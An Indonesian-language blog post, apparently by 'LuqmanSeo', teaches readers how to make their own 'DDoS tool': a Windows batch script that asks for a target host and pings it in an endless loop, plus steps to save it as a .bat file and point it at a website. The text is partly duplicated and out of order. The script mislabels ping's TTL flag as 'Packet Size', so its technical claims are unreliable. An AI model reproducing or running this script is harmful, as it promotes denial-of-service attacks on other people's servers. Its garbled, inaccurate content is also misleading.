malam!
pada tau DDoS kan? tau lah! nah,disini saya akan memberikan ilmu/tutorial cara membuat tools DDoS sendiri :D
ini tools yang dibutuhkan :
1. Notepad .
2. Script DDos .
langkah langkah nya gan :
3. Simpan Dengan Type "All Files" Dan Beri Nama Sesuka Anda Dengan Format .bat ( Contoh : Ddos.bat )
masukan alamat web yang ingin di DDOS.
okk! sekian dan terima kasih! :D
Source : LuqmanSeo
pada tau DDoS kan? tau lah! nah,disini saya akan memberikan ilmu/tutorial cara membuat tools DDoS sendiri :D
ini tools yang dibutuhkan :
1. Notepad .
2. Script DDos .
langkah langkah nya gan :
- Buka Notepad.
- Copy & Paste Kan Script Di Bawah Ini :
@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo = Hacking Tools =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server +
echo + Author : Luqmanul Hakim +
echo + Visite : LuqmanSeo.blogspot.com +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo * Masukan IP / Host Target *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
3. Simpan Dengan Type "All Files" Dan Beri Nama Sesuka Anda Dengan Format .bat ( Contoh : Ddos.bat )
Cara Pakai :
Pada menu Server-Target -> * Masukan IP / Host Target *masukan alamat web yang ingin di DDOS.
okk! sekian dan terima kasih! :D
Source : LuqmanSeo